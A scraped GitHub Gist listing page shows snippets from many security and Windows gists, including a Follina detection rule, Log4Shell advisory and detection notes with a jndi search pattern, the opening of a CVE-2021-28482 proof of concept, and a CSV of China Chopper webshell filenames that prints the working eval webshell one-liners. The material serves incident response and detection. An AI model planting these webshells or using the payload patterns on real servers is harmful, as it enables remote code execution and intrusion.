Skip to content

Instantly share code, notes, and snippets.

@XenoPanther
XenoPanther / Windows ReFS versions.en.md
Last active November 13, 2024 16:00 — forked from 0xbadfca11/00_README.md
Windows ReFS versions

Version number is reported by fsutil fsinfo refsinfo, available on Windows 10 and Windows Server 2016.

ReFS 1.1

  • Version of formatted by Windows Server 2012.
  • Version 1.1 is used already in Windows Server 8 Beta. I have never seen version 1.0.
  • Can use and store alternate data streams, when mount on 8.1/2012 R2 or later.

ReFS 1.2

  • Version of formatted by Windows 8.1, Windows 10 v1507 to v1607, Windows Server 2012 R2, and when specified ReFSv1 on Windows Server 2016 or later.
  • Cannot use alternate data streams, when mount on 2012.
title: Suspicious msdt.exe execution - Office Exploit
id: 97a80ed7-1f3f-4d05-9ef4-65760e634f6b
status: experimental
description: This rule will monitor suspicious arguments passed to the msdt.exe process. These arguments are an indicator of recent Office/Msdt exploitation.
references:
- https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e
- https://twitter.com/MalwareJake/status/1531019243411623939
author: 'Matthew Brennan'
tags:
- attack.execution
@SwitHak
SwitHak / 20211210-TLP-WHITE_LOG4J.md
Last active November 8, 2024 17:29
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

  • Royce Williams list sorted by vendors responses Royce List
  • Very detailed list NCSC-NL
  • The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List
@Neo23x0
Neo23x0 / log4j_rce_detection.md
Last active September 11, 2024 21:41
Log4j RCE CVE-2021-44228 Exploitation Detection

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
@irsdl
irsdl / PoC_CVE-2021-28482.py
Created September 7, 2021 21:15 — forked from testanull/PoC_CVE-2021-28482.py
PoC of CVE-2021-28482
import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
@JohnHammond
JohnHammond / china_chopper_webshells.csv
Last active October 11, 2024 07:52
Microsoft Exchange Incident "China Chopper" ASPX Webshell filenames
# Occurrences Webshell Filename WebShell Syntax
46 C:\inetpub\wwwroot\aspnet_client\supp0rt.aspx http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["orange"],"unsafe");}</script>
35 C:\inetpub\wwwroot\aspnet_client\discover.aspx http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script>
21 C:\inetpub\wwwroot\aspnet_client\shell.aspx http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["gttkomomo"],"unsafe");}</script>
13 C:\inetpub\wwwroot\aspnet_client\HttpProxy.aspx http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["bingo"],"unsafe");}</script>
8 C:\inetpub\wwwroot\aspnet_client\0QWYSEXe.aspx http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["XOrSeMr3kgWUdFf6"],"unsafe");}</script>
7 C:\inetpub\wwwroot\aspnet_client\system_web\error.aspx http://f/<script language=
@FadeMind
FadeMind / fuck_telemetry.cmd
Created August 26, 2020 13:24
Turn Off Telemetry in Windows 10
@echo off
echo.
openfiles > NUL 2>&1
if %errorlevel% NEQ 0 (
echo You are not running as Administrator...
echo This batch cannot do it's job without elevation!
echo.
echo Right-click and select ^'Run as Administrator^' and try again...
echo.
@artizirk
artizirk / debug.md
Last active October 27, 2024 07:36
Debug WireGuard Linux kernel module
@zerotag
zerotag / DownloadFilesFromRepo.ps1
Created June 15, 2019 12:45 — forked from chrisbrownie/DownloadFilesFromRepo.ps1
PowerShell function to download files from a GitHub repository
function DownloadFilesFromRepo {
<#
.SYNOPSIS
This function retrieves the specified repository on GitHub to a local directory with authentication.
.DESCRIPTION
This function retrieves the specified repository on GitHub to a local directory with authentication, being a single file, a complete folder, or the entire repository.
.PARAMETER User
@Neo23x0
Neo23x0 / annotations.xml
Last active November 12, 2024 01:34
Sources for APT Groups and Operations Search Engine
<?xml version="1.0" encoding="UTF-8"?>
<Annotations start="0" num="171" total="171">
<Annotation about="www.bussink.net/*" timestamp="0x0005d7bc4022b026" href="ChF3d3cuYnVzc2luay5uZXQvKhCm4IqBxPf1Ag">
<Label name="_cse_turlh5vi4xc"/>
<AdditionalData attribute="original_url" value="https://www.bussink.net/"/>
</Annotation>
<Annotation about="*.thedfirreport.com/*" timestamp="0x0005d76dd5f8679d" href="ChUqLnRoZWRmaXJyZXBvcnQuY29tLyoQnc_hr93t9QI">
<Label name="_cse_turlh5vi4xc"/>
<AdditionalData attribute="original_url" value="https://thedfirreport.com/"/>
</Annotation>